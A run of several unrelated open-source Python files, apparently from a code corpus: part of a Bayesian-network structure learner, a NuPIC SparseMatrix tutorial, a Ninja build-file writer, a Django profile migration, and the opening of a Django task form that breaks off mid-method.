if (edge1[1] == edge2[0] and len(edge1) == 2 and len(edge2) == 3):
check1 = True
elif (edge1[1] == edge2[1] and len(edge1) == 2 and len(edge2) == 3):
check = True
inverted = True
for edge3 in dedges:
if edge3 != edge1 and ((edge3[0] == edge1[0] and edge3[1]
== edge2[1]) or (edge3[1] == edge1[0] and edge3[0]
== edge2[1])):
check2 = False
if check1 == True and check2 == True:
if inverted:
dedges.append([edge1[1], edge2[0]])
else:
dedges.append([edge1[1], edge2[1]])
dedges.remove(edge2)
# rule 2
check1, check2 = False, False
if (edge1[1] == edge2[0] and len(edge1) == 2 and len(edge2) == 2):
check1 = True
for edge3 in dedges:
if ((edge3[0] == edge1[0] and edge3[1]
== edge2[1]) or (edge3[1] == edge1[0] and edge3[0]
== edge2[1]) and len(edge3) == 3):
check2 = True
if check1 == True and check2 == True:
if edge3[0] == edge1[0]:
dedges.append([edge3[0], edge3[1]])
elif edge3[1] == edge1[0]:
dedges.append([edge3[1], edge3[0]])
dedges.remove(edge3)
# rule 3
check1, check2 = False, False
if len(edge1) == 2 and len(edge2) == 2:
if (edge1[1] == edge2[1] and edge1[0] != edge2[0]):
check1 = True
for v in variables:
if (exists_undirected_edge(v, edge1[0]) and
exists_undirected_edge(v, edge1[1]) and
exists_undirected_edge(v, edge2[0])):
check2 = True
if check1 == True and check2 == True:
dedges.append([v, edge1[1]])
for edge3 in dedges:
if (len(edge3) == 3 and ((edge3[0] == v and edge3[1]
== edge1[1]) or (edge3[1] == v and edge3[0] ==
edge1[1]))):
dedges.remove(edge3)
# return one possible graph skeleton from the pdag class found
for x in range(len(dedges)):
if len(dedges[x]) == 3:
dedges[x] = dedges[x][:2]
pdag.E = dedges
pdag.toporder()
return pdag
def lg_constraint_estimatestruct(self, data, pvalparam=0.05, bins=10, indegree=1):
'''
Learn a Bayesian network structure from linear Gaussian data given by *data* using constraint-based approaches. This function works by discretizing the linear Gaussian data into *bins* number of bins, and running the *discrete_constraint_estimatestruct* method on that discrete data with *pvalparam* and *indegree* as arguments. It returns the :doc:`GraphSkeleton <graphskeleton>` instance returned by this function.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 78.3223,
'SAT': 56.33,
...
},
...
]
2. *pvalparam* -- (Optional, default is 0.05) The p-value below which to consider something significantly unlikely. A common number used is 0.05
3. *bins* -- (Optional, default is 10) The number of bins to discretize the data into. The method is to find the highest and lowest value, divide that interval uniformly into a certain number of bins, and place the data inside. This number must be chosen carefully in light of the number of trials. There must be at least 5 trials in every bin, with more if the indegree is increased.
4. *indegree* -- (Optional, default is 1) The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge amount of trials are required to avoid a divide-by-zero error.
The number of bins and indegree must be chosen carefully based on the size and nature of the data set. Too many bins will lead to not enough data per bin, while too few bins will lead to dependencies not getting noticed.
Usage example: this would learn structure from a set of 8000 linear Gaussian samples::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.lgbayesiannetwork import LGBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
lgbn = LGBayesianNetwork(skel, nd)
data = lgbn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# estimate structure
result = learner.lg_constraint_estimatestruct(data)
# output
print json.dumps(result.E, indent=2)
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
cdata = copy.deepcopy(data)
# establish ranges
ranges = dict()
for variable in cdata[0].keys():
ranges[variable] = [float("infinity"), float("infinity") * -1]
for sample in cdata:
for var in sample.keys():
if sample[var] < ranges[var][0]:
ranges[var][0] = sample[var]
if sample[var] > ranges[var][1]:
ranges[var][1] = sample[var]
# discretize cdata set
bincounts = dict()
for key in cdata[0].keys():
bincounts[key] = [0 for _ in range(bins)]
for sample in cdata:
for i in range(bins):
for var in sample.keys():
if (sample[var] >= (ranges[var][0] + (ranges[var][1] - ranges[var][0]) * i / float(bins)) and (sample[var] <= (ranges[var][0] + (ranges[var][1] - ranges[var][0]) * (i + 1) / float(bins)))):
sample[var] = i
bincounts[var][i] += 1
# run discrete_constraint_estimatestruct
return self.discrete_constraint_estimatestruct(cdata, pvalparam, indegree)
def discrete_condind(self, data, X, Y, U):
'''
Test how independent a variable *X* and a variable *Y* are in a discrete data set given by *data*, where the independence is conditioned on a set of variables given by *U*. This method works by assuming as a null hypothesis that the variables are conditionally independent on *U*, and thus that:
.. math::
P(X, Y, U) = P(U) \\cdot P(X|U) \\cdot P(Y|U)
It tests the deviance of the data from this null hypothesis, returning the result of a chi-square test and a p-value.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
2. *X* -- A variable whose dependence on Y we are testing given U.
3. *Y* -- A variable whose dependence on X we are testing given U.
4. *U* -- A list of variables that are given.
Returns:
1. *chi* -- The result of the chi-squared test on the data. This is a
measure of the deviance of the actual distribution of X and
Y given U from the expected distribution of X and Y given U.
Since the null hypothesis is that X and Y are independent
given U, the expected distribution is that :math:`P(X, Y, U) =
P(U) P(X | U) P (Y | U)`.
2. *pval* -- The p-value of the test, meaning the probability of
attaining a chi-square result as extreme as or more extreme
than the one found, assuming that the null hypothesis is
true. (e.g., a p-value of .05 means that if X and Y were
independent given U, the chance of getting a chi-squared
result this high or higher are .05)
3. *U* -- The 'witness' of X and Y's independence. This is the variable
that, when it is known, leaves X and Y independent.
For more information see Koller et al. 790.
'''
# find possible outcomes and store
_outcomes = dict()
for key in data[0].keys():
_outcomes[key] = [data[0][key]]
for sample in data:
for key in _outcomes.keys():
if _outcomes[key].count(sample[key]) == 0:
_outcomes[key].append(sample[key])
# store number of outcomes for X, Y, and U
Xnumoutcomes = len(_outcomes[X])
Ynumoutcomes = len(_outcomes[Y])
Unumoutcomes = []
for val in U:
Unumoutcomes.append(len(_outcomes[val]))
# calculate P(U) -- the distribution of U
PU = 1
# define helper function to add a dimension to an array recursively
def add_dimension_to_array(mdarray, size):
if isinstance(mdarray, list):
for h in range(len(mdarray)):
mdarray[h] = add_dimension_to_array(mdarray[h], size)
return mdarray
else:
mdarray = [0 for _ in range(size)]
return mdarray
# make PU the right size
for size in Unumoutcomes:
PU = add_dimension_to_array(PU, size)
# fill with data
if (len(U) > 0):
for sample in data:
tmp = PU
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
# calculate P(X, U) -- the distribution of X and U
PXandU = [0 for _ in range(Xnumoutcomes)]
for size in Unumoutcomes:
PXandU = add_dimension_to_array(PXandU, size)
for sample in data:
Xindex = _outcomes[X].index(sample[X])
if len(U) > 0:
tmp = PXandU[Xindex]
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
else:
PXandU[Xindex] += 1
# calculate P(Y, U) -- the distribution of Y and U
PYandU = [0 for _ in range(Ynumoutcomes)]
for size in Unumoutcomes:
PYandU = add_dimension_to_array(PYandU, size)
for sample in data:
Yindex = _outcomes[Y].index(sample[Y])
if len(U) > 0:
tmp = PYandU[Yindex]
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
else:
PYandU[Yindex] += 1
# assemble P(U)P(X|U)P(Y|U) -- the expected distribution if X and Y are
# independent given U.
expected = [[ 0 for _ in range(Ynumoutcomes)] for __ in range(Xnumoutcomes)]
# define helper function to multiply the entries of two matrices
def multiply_entries(matrixa, matrixb):
matrix1 = copy.deepcopy(matrixa)
matrix2 = copy.deepcopy(matrixb)
if isinstance(matrix1, list):
for h in range(len(matrix1)):
matrix1[h] = multiply_entries(matrix1[h], matrix2[h])
return matrix1
else:
return (matrix1 * matrix2)
# define helper function to divide the entries of two matrices
def divide_entries(matrixa, matrixb):
matrix1 = copy.deepcopy(matrixa)
matrix2 = copy.deepcopy(matrixb)
if isinstance(matrix1, list):
for h in range(len(matrix1)):
matrix1[h] = divide_entries(matrix1[h], matrix2[h])
return matrix1
else:
return (matrix1 / float(matrix2))
# combine known graphs to calculate P(U)P(X|U)P(Y|U)
for x in range(Xnumoutcomes):
for y in range(Ynumoutcomes):
product = multiply_entries(PXandU[x], PYandU[y])
final = divide_entries(product, PU)
expected[x][y] = final
# find P(XYU) -- the actual distribution of X, Y, and U -- in sample
PXYU = [[ 0 for _ in range(Ynumoutcomes)] for __ in range(Xnumoutcomes)]
for size in Unumoutcomes:
PXYU = add_dimension_to_array(PXYU, size)
for sample in data:
Xindex = _outcomes[X].index(sample[X])
Yindex = _outcomes[Y].index(sample[Y])
if len(U) > 0:
tmp = PXYU[Xindex][Yindex]
for x in range(len(U)-1):
Uindex = _outcomes[U[x]].index(sample[U[x]])
tmp = tmp[Uindex]
lastindex = _outcomes[U[-1]].index(sample[U[-1]])
tmp[lastindex] += 1
else:
PXYU[Xindex][Yindex] += 1
# use scipy's chisquare to determine the deviance of the evidence
a = np.array(expected)
a = a.flatten()
b = np.array(PXYU)
b = b.flatten()
# delete entries with value 0 (they mess up the chisquare function)
for i in reversed(range(b.size)):
if (b[i] == 0):
if i != 0:
a.itemset(i-1, a[i-1]+a[i])
a = np.delete(a, i)
b = np.delete(b, i)
# run chi-squared
chi, pv = chisquare(a, b)
# return chi-squared result, p-value for that result, and witness
return chi, pv, U
def discrete_estimatebn(self, data, pvalparam=.05, indegree=1):
'''
Fully learn a Bayesian network from discrete data given by *data*. This function combines the *discrete_constraint_estimatestruct* method (where it passes in the *pvalparam* and *indegree* arguments) with the *discrete_mle_estimateparams* method. It returns a complete :doc:`DiscreteBayesianNetwork <discretebayesiannetwork>` class instance learned from the data.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 'B',
'SAT': 'lowscore',
...
},
...
]
2. *pvalparam* -- The p-value below which to consider something significantly unlikely. A common number used is 0.05
3. *indegree* -- The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge amount of trials are required to avoid a divide-by- zero error.
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
# learn graph skeleton
skel = self.discrete_constraint_estimatestruct(data, pvalparam=pvalparam, indegree=indegree)
# learn parameters
bn = self.discrete_mle_estimateparams(skel, data)
# return
return bn
def lg_estimatebn(self, data, pvalparam=.05, bins=10, indegree=1):
'''
Fully learn a Bayesian network from linear Gaussian data given by *data*. This function combines the *lg_constraint_estimatestruct* method (where it passes in the *pvalparam*, *bins*, and *indegree* arguments) with the *lg_mle_estimateparams* method. It returns a complete :doc:`LGBayesianNetwork <discretebayesiannetwork>` class instance learned from the data.
Arguments:
1. *data* -- An array of dicts containing samples from the network in {vertex: value} format. Example::
[
{
'Grade': 75.23423,
'SAT': 873.42342,
...
},
...
]
2. *pvalparam* -- The p-value below which to consider something significantly unlikely. A common number used is 0.05
3. *indegree* -- The upper bound on the size of a witness set (see Koller et al. 85). If this is larger than 1, a huge amount of trials are required to avoid a divide-by- zero error.
Usage example: this would learn entire Bayesian networks from sets of 8000 data points::
import json
from libpgm.nodedata import NodeData
from libpgm.graphskeleton import GraphSkeleton
from libpgm.lgbayesiannetwork import LGBayesianNetwork
from libpgm.discretebayesiannetwork import DiscreteBayesianNetwork
from libpgm.pgmlearner import PGMLearner
# LINEAR GAUSSIAN
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestlgdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
lgbn = LGBayesianNetwork(skel, nd)
data = lgbn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# learn bayesian network
result = learner.lg_estimatebn(data)
# output
print json.dumps(result.E, indent=2)
print json.dumps(result.Vdata, indent=2)
# DISCRETE
# generate some data to use
nd = NodeData()
nd.load("../tests/unittestdict.txt") # an input file
skel = GraphSkeleton()
skel.load("../tests/unittestdict.txt")
skel.toporder()
bn = DiscreteBayesianNetwork(skel, nd)
data = bn.randomsample(8000)
# instantiate my learner
learner = PGMLearner()
# learn bayesian network
result = learner.discrete_estimatebn(data)
# output
print json.dumps(result.E, indent=2)
print json.dumps(result.Vdata, indent=2)
'''
assert (isinstance(data, list) and data and isinstance(data[0], dict)), "Arg must be a list of dicts."
# learn graph skeleton
skel = self.lg_constraint_estimatestruct(data, pvalparam=pvalparam, bins=bins, indegree=indegree)
# learn parameters
bn = self.lg_mle_estimateparams(skel, data)
# return
return bn
|
bsd-3-clause
|
elkingtonmcb/nupic
|
examples/bindings/sparse_matrix_how_to.py
|
35
|
12347
|
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import cPickle
# SparseMatrix is a versatile class that offers a wide range of functionality.
# This tutorial will introduce you to the main features of SparseMatrix.
# SparseMatrix is located in nupic.bindings.math, and here is the import you need:
from nupic.bindings.math import *
# 1. Types of sparse matrices:
# ===========================
# There are three types of SparseMatrix, depending on the precision you need
# in your application: 32 and 32 bits. To create a SparseMatrix holding
# floating point values of the desired precision, simply specify it as the
# 'dtype' parameter in the constructor:
s = SparseMatrix(dtype='Float32')
# 2. Global Epsilon:
# =================
# By default, NuPIC is compiled to handle only 32 bits of precision at max,
# and sparse matrices consider a floating point value to be zero if it's less than
# 1e-6 (the best precision possible with 32 bits floats). This value of 1e-6 is
# called "epsilon", and it is a global value used throughout NuPIC to deal with
# near-zero floating point numbers.
# If this is not enough, NuPIC can be recompiled to access more precision.
# With NTA_DOUBLE_PRECISION or NTA_QUAD_PRECISION set at compile time, NuPIC can
# use 32 bits to represent floating point values. The global epsilon can
# then be set to smaller values via the variable nupic::Epsilon in nupic/math/math.hpp
print '\nGlobal epsilon :', getGlobalEpsilon()
# 3. Creation of sparse matrices:
# ==============================
# There are several convenient ways to create sparse matrices.
# You can create a SparseMatrix by passing it a 2D array:
s = SparseMatrix([[1,2],[3,4]], dtype='Float32')
print '\nFrom array 32\n', s
# ... or by passing it a numpy.array:
s = SparseMatrix(numpy.array([[1,2],[3,4]]),dtype='Float32')
print '\nFrom numpy array 32\n', s
# ... or by using one of the shortcuts: SM32, SM32:
s = SM32([[1,2],[3,4]])
print '\nWith shortcut 32\n', s
# It is also possible to create an empty SparseMatrix, or a copy of another
# SparseMatrix, or a SparseMatrix from a string in CSR format:
s_empty = SM32()
print '\nEmpty sparse matrix\n', s_empty
s_string = SM32('sm_csr_1.5 26 2 2 4 2 0 1 1 2 2 0 3 1 4')
print '\nSparse matrix from string\n', s_string
# A sparse matrix can be converted to a dense one via toDense:
a = numpy.array(s_string.toDense())
print '\ntoDense\n', a
# To set a sparse matrix from a dense one, one can use fromDense:
s = SM32()
s.fromDense(numpy.random.random((4,4)))
print '\nfromDense\n', s
# A sparse matrix can be pickled:
cPickle.dump(s, open('sm.txt', 'wb'))
s2 = cPickle.load(open('sm.txt', 'rb'))
print '\nPickling\n', s2
# 4. Simple queries:
# =================
# You can print a SparseMatrix, and query it for its number of rows, columns,
# non-zeros per row or column... There are many query methods available.
# All row operations are mirrored by the equivalent column operations
# Most operations are available either for a given row, or a given col, or
# all rows or all cols simultaneously. All col operations can be pretty efficient,
# even if the internal storage is CSR.
s = SM32(numpy.random.random((4,4)))
s.threshold(.5)
print '\nPrint\n', s
print '\nNumber of rows ', s.nRows()
print 'Number of columns ', s.nCols()
print 'Is matrix zero? ', s.isZero()
print 'Total number of non zeros ', s.nNonZeros()
print 'Sum of all values ', s.sum()
print 'Prod of non-zeros ', s.prod()
print 'Maximum value and its location ', s.max()
print 'Minimum value and its location ', s.min()
print 'Number of non-zeros on row 0 ', s.nNonZerosOnRow(0)
print 'If first row zero? ', s.isRowZero(0)
print 'Number of non-zeros on each row ', s.nNonZerosPerRow()
print 'Minimum on row 0 ', s.rowMin(0)
print 'Minimum values and locations for all rows', s.rowMin()
print 'Maximum on row 0 ', s.rowMax(0)
print 'Maximum values and locations for all rows', s.rowMax()
print 'Sum of values on row 0 ', s.rowSum(0)
print 'Sum of each row ', s.rowSums()
print 'Product of non-zeros on row 1', s.rowProd(1)
print 'Product of each row ', s.rowProds()
print 'Number of non-zeros on col 0 ', s.nNonZerosOnCol(0)
print 'If first col zero? ', s.isColZero(0)
print 'Number of non-zeros on each col ', s.nNonZerosPerCol()
print 'Minimum on col 0 ', s.colMin(0)
print 'Minimum values and locations for all cols', s.colMin()
print 'Maximum on col 0 ', s.colMax(0)
print 'Maximum values and locations for all cols', s.colMax()
print 'Sum of values on col 0 ', s.colSum(0)
print 'Sum of each col ', s.colSums()
print 'Product of non-zeros on col 1', s.colProd(1)
print 'Product of each col ', s.colProds()
# 5. Element access and slicing:
# =============================
# It is very easy to access individual elements:
print '\n', s
print '\ns[0,0] = ', s[0,0], 's[1,1] = ', s[1,1]
s[0,0] = 3.5
print 'Set [0,0] to 3.5 ', s[0,0]
# There are powerful slicing operations:
print '\ngetOuter\n', s.getOuter([0,2],[0,2])
s.setOuter([0,2],[0,2],[[1,2],[3,4]])
print '\nsetOuter\n', s
s.setElements([0,1,2],[0,1,2],[1,1,1])
print '\nsetElements\n', s
print '\ngetElements\n', s.getElements([0,1,2],[0,1,2])
s2 = s.getSlice(0,2,0,3)
print '\ngetSlice\n', s2
s.setSlice(1,1, s2)
print '\nsetSlice\n', s
# A whole row or col can be set to zero with one call:
s.setRowToZero(1)
print '\nsetRowToZero\n', s
s.setColToZero(1)
print '\nsetColToZero\n', s
# Individual rows and cols can be retrieved as sparse or dense vectors:
print '\nrowNonZeros ', s.rowNonZeros(0)
print 'colNonZeros ', s.colNonZeros(0)
print 'getRow ', s.getRow(0)
print 'getCol ', s.getCol(0)
# 6. Dynamic features:
# ===================
# SparseMatrix is very dynamic. Rows and columns can be added and deleted.
# A sparse matrix can also be resized and reshaped.
print '\n', s
s.reshape(2,8)
print '\nreshape 2 8\n', s
s.reshape(8,2)
print '\nreshape 8 2\n', s
s.reshape(1,16)
print '\nreshape 1 16\n', s
s.reshape(4,4)
print '\nreshape 4 4\n', s
s.resize(5,5)
print '\nresize 5 5\n', s
s.resize(3,3)
print '\nresize 3 3\n', s
s.resize(4,4)
print '\nresize 4 4\n', s
s.deleteRows([3])
print '\ndelete row 3\n', s
s.deleteCols([1])
print '\ndelete col 1\n', s
s.addRow([1,2,3])
print '\nadd row 1 2 3\n', s
s.addCol([1,2,3,4])
print '\nadd col 1 2 3 4\n', s
s.deleteRows([0,3])
print '\ndelete rows 0 and 3\n', s
s.deleteCols([1,2])
print '\ndelete cols 1 and 2\n', s
# It is also possible to threshold a row, column or whole sparse matrix.
# This operation usually introduces zeros.
s.normalize()
print '\n', s
s.thresholdRow(0, .1)
print '\nthreshold row 0 .1\n', s
s.thresholdCol(1, .1)
print '\nthreshold col 1 .1\n', s
s.threshold(.1)
print '\nthreshold .1\n', s
# 7. Element wise operations:
# ==========================
# Element wise operations are prefixed with 'element'. There are row-oriented
# column-oriented and whole matrix element-wise operations.
s = SM32(numpy.random.random((4,4)))
print '\n', s
s.elementNZInverse()
print '\nelementNZInverse\n', s
s.elementNZLog()
print '\nelementNZLog\n', s
s = abs(s)
print '\nabs\n', s
s.elementSqrt()
print '\nelementSqrt\n', s
s.add(4)
print '\nadd 4\n', s
s.normalizeRow(1, 10)
print '\nnormalizeRow 1 10\n', s
print 'sum row 1 = ', s.rowSum(1)
s.normalizeCol(0, 3)
print '\nnormalizeCol 0 3\n', s
print 'sum col 0 = ', s.colSum(0)
s.normalize(5)
print '\nnormalize to 5\n', s
print 'sum = ', s.sum()
s.normalize()
print '\nnormalize\n', s
print 'sum = ', s.sum()
s.transpose()
print '\ntranspose\n', s
s2 = SM32(numpy.random.random((3,4)))
print '\n', s2
s2.transpose()
print '\ntranspose rectangular\n', s2
s2.transpose()
print '\ntranspose rectangular again\n', s2
# 8. Matrix vector and matrix matrix operations:
# =============================================
# SparseMatrix provides matrix vector multiplication on the right and left,
# as well as specialized operations between the a vector and the rows
# of the SparseMatrix.
x = numpy.array([1,2,3,4])
print '\nx = ', x
print 'Product on the right:\n', s.rightVecProd(x)
print 'Product on the left:\n', s.leftVecProd(x)
print 'Product of x elements corresponding to nz on each row:\n', s.rightVecProdAtNZ(x)
print 'Product of x elements and nz:\n', s.rowVecProd(x)
print 'Max of x elements corresponding to nz:\n', s.vecMaxAtNZ(x)
print 'Max of products of x elements and nz:\n', s.vecMaxProd(x)
print 'Max of elements of x corresponding to nz:\n', s.vecMaxAtNZ(x)
# axby computes linear combinations of rows and vectors
s.axby(0, 1.5, 1.5, x)
print '\naxby 0 1.5 1.5\n', s
s.axby(1.5, 1.5, x)
print '\naxby 1.5 1.5\n', s
# The multiplication operator can be used both for inner and outer product,
# depending on the shape of its operands, when using SparseMatrix instances:
s_row = SM32([[1,2,3,4]])
s_col = SM32([[1],[2],[3],[4]])
print '\nInner product: ', s_row * s_col
print '\nOuter product:\n', s_col * s_row
# SparseMatrix supports matrix matrix multiplication:
s1 = SM32(numpy.random.random((4,4)))
s2 = SM32(numpy.random.random((4,4)))
print '\nmatrix matrix multiplication\n', s1 * s2
# The block matrix vector multiplication treats the matrix as if it were
# a collection of narrower matrices. The following multiplies a1 by x and then a2 by x,
# where a1 is the sub-matrix of size (4,2) obtained by considering
# only the first two columns of a, and a2 the sub-matrix obtained by considering only
# the last two columns of x.
a = SM32([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]])
x = [1,2,3,4]
print a.blockRightVecProd(2, x)
# To do an element multiplication of two matrices, do:
print a
b = SM32(numpy.random.randint(0,2,(4,4)))
print b
a.elementNZMultiply(b)
print a
# In general, the "element..." operations implement element by element operations.
# 9. Arithmetic operators:
# =======================
# It is possible to use all 4 arithmetic operators, with scalars or matrices:
print '\ns + 3\n', s + 3
print '\n3 + s\n', 3 + s
print '\ns - 1\n', s - 1
print '\n1 - s\n', 1 - s
print '\ns + s\n', s + s
print '\ns * 3\n', s * 3
print '\n3 * s\n', 3 * s
print '\ns * s\n', s * s
print '\ns / 3.1\n', s / 3.1
# ... and to write arbitrarily linear combinations of sparse matrices:
print '\ns1 + 2 * s - s2 / 3.1\n', s1 + 2 * s - s2 / 3.1
# In place operators are supported:
s += 3.5
print '\n+= 3.5\n', s
s -= 3.2
print '\n-= 3.2\n', s
s *= 3.1
print '\n*= 3.1\n', s
s /= -1.5
print '\n/= -1.5\n', s
# 10. Count/find:
# ==============
# Use countWhereEqual and whereEqual to count or find the elements that have
# a specific value. The first four parameters define a box in which to look:
# [begin_row, end_row) X [begin_col, end _col). The indices returned by whereEqual
# are relative to the orignal matrix. countWhereEqual is faster than using len()
# on the list returned by whereEqual.
s = SM32(numpy.random.randint(0,3,(5,5)))
print '\nThe matrix is now:\n', s
print '\nNumber of elements equal to 0=', s.countWhereEqual(0,5,0,5,0)
print 'Number of elements equal to 1=', s.countWhereEqual(0,5,0,5,1)
print 'Number of elements equal to 2=', s.countWhereEqual(0,5,0,5,2)
print '\nIndices of the elements == 0:', s.whereEqual(0,5,0,5,0)
print '\nIndices of the elements == 1:', s.whereEqual(0,5,0,5,1)
print '\nIndices of the elements == 2:', s.whereEqual(0,5,0,5,2)
# ... and there is even more:
print '\nAll ' + str(len(dir(s))) + ' methods:\n', dir(s)
|
agpl-3.0
|
lushfuture/Phys-Comp
|
five-test/node_modules/johnny-five/junk/firmata-latest/node_modules/serialport/node_modules/node-gyp/legacy/tools/gyp/pylib/gyp/ninja_syntax.py
|
35
|
4968
|
# This file comes from
# https://github.com/martine/ninja/blob/master/misc/ninja_syntax.py
# Do not edit! Edit the upstream one instead.
"""Python module for generating .ninja files.
Note that this is emphatically not a required piece of Ninja; it's
just a helpful utility for build-file-generation systems that already
use Python.
"""
import textwrap
import re
def escape_spaces(word):
return word.replace('$ ','$$ ').replace(' ','$ ')
class Writer(object):
def __init__(self, output, width=78):
self.output = output
self.width = width
def newline(self):
self.output.write('\n')
def comment(self, text):
for line in textwrap.wrap(text, self.width - 2):
self.output.write('# ' + line + '\n')
def variable(self, key, value, indent=0):
if value is None:
return
if isinstance(value, list):
value = ' '.join(filter(None, value)) # Filter out empty strings.
self._line('%s = %s' % (key, value), indent)
def rule(self, name, command, description=None, depfile=None,
generator=False, restat=False, deplist=None):
self._line('rule %s' % name)
self.variable('command', command, indent=1)
if description:
self.variable('description', description, indent=1)
if depfile:
self.variable('depfile', depfile, indent=1)
if deplist:
self.variable('deplist', deplist, indent=1)
if generator:
self.variable('generator', '1', indent=1)
if restat:
self.variable('restat', '1', indent=1)
def build(self, outputs, rule, inputs=None, implicit=None, order_only=None,
variables=None):
outputs = self._as_list(outputs)
all_inputs = self._as_list(inputs)[:]
out_outputs = map(escape_spaces, outputs)
all_inputs = map(escape_spaces, all_inputs)
if implicit:
implicit = map(escape_spaces, self._as_list(implicit))
all_inputs.append('|')
all_inputs.extend(implicit)
if order_only:
order_only = map(escape_spaces, self._as_list(order_only))
all_inputs.append('||')
all_inputs.extend(order_only)
self._line('build %s: %s %s' % (' '.join(out_outputs),
rule,
' '.join(all_inputs)))
if variables:
for key, val in variables:
self.variable(key, val, indent=1)
return outputs
def include(self, path):
self._line('include %s' % path)
def subninja(self, path):
self._line('subninja %s' % path)
def default(self, paths):
self._line('default %s' % ' '.join(self._as_list(paths)))
def _count_dollars_before_index(self, s, i):
"""Returns the number of '$' characters right in front of s[i]."""
dollar_count = 0
dollar_index = i - 1
while dollar_index > 0 and s[dollar_index] == '$':
dollar_count += 1
dollar_index -= 1
return dollar_count
def _line(self, text, indent=0):
"""Write 'text' word-wrapped at self.width characters."""
leading_space = ' ' * indent
while len(text) > self.width:
# The text is too wide; wrap if possible.
# Find the rightmost space that would obey our width constraint and
# that's not an escaped space.
available_space = self.width - len(leading_space) - len(' $')
space = available_space
while True:
space = text.rfind(' ', 0, space)
if space < 0 or \
self._count_dollars_before_index(text, space) % 2 == 0:
break
if space < 0:
# No such space; just use the first unescaped space we can find.
space = available_space - 1
while True:
space = text.find(' ', space + 1)
if space < 0 or \
self._count_dollars_before_index(text, space) % 2 == 0:
break
if space < 0:
# Give up on breaking.
break
self.output.write(leading_space + text[0:space] + ' $\n')
text = text[space+1:]
# Subsequent lines are continuations, so indent them.
leading_space = ' ' * (indent+2)
self.output.write(leading_space + text + '\n')
def _as_list(self, input):
if input is None:
return []
if isinstance(input, list):
return input
return [input]
def escape(string):
"""Escape a string such that it can be embedded into a Ninja file without
further interpretation."""
assert '\n' not in string, 'Ninja syntax does not allow newlines'
# We only have one special metacharacter: '$'.
return string.replace('$', '$$')
|
mit
|
nino-c/plerp.org
|
src/profiles/migrations/0001_initial.py
|
64
|
1048
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import uuid
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('user', models.OneToOneField(serialize=False, primary_key=True, to=settings.AUTH_USER_MODEL)),
('slug', models.UUIDField(default=uuid.uuid4, blank=True, editable=False)),
('picture', models.ImageField(verbose_name='Profile picture', upload_to='profile_pics/%Y-%m-%d/', blank=True, null=True)),
('bio', models.CharField(verbose_name='Short Bio', max_length=200, blank=True, null=True)),
('email_verified', models.BooleanField(default=False, verbose_name='Email verified')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
|
mit
|
Yuecai/com-yuecai-dream
|
src/nodelay/forms.py
|
1
|
9690
|
# coding=utf-8
#########################################################################
# File Name: forms.py
# Original Author: 段凯强
# Mail: duankq@ios.ac.cn
# Created Time: 2013-12-26
# Update:
#########################################################################
#########################################################################
# Copyright (c) 2013~2014 by 段凯强
# Reand the file "license" distributed with these sources, or XXXX
# XXXXXXXXXXXXXXXXXX switch for additional information, such as how
# to use, copy, modify, sell and/or distribute this software and its
# documentation any purpose anyway.
#########################################################################
import datetime, time
import re
from django import forms
class BasicTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
title = forms.CharField()
content = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Basic':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_title(self):
pattern = re.compile(u'^[a-zA-Z0-9\u4e00-\u9fa5]+$')
title = self.cleaned_data['title']
l = len(title)
if l >= 1 and l <= 10 and pattern.match(title):
return title
raise forms.ValidationError('title_err')
def clean_content(self):
